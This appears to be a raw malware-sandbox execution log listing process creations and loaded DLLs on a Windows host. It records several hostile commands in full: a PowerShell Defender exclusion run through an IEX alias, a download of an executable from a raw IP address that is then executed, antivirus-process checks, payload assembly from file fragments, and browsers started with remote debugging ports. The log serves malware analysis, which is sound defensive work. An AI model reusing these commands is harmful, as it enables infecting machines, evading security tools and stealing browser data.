                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AuthorizationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.comJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired mJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com mJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
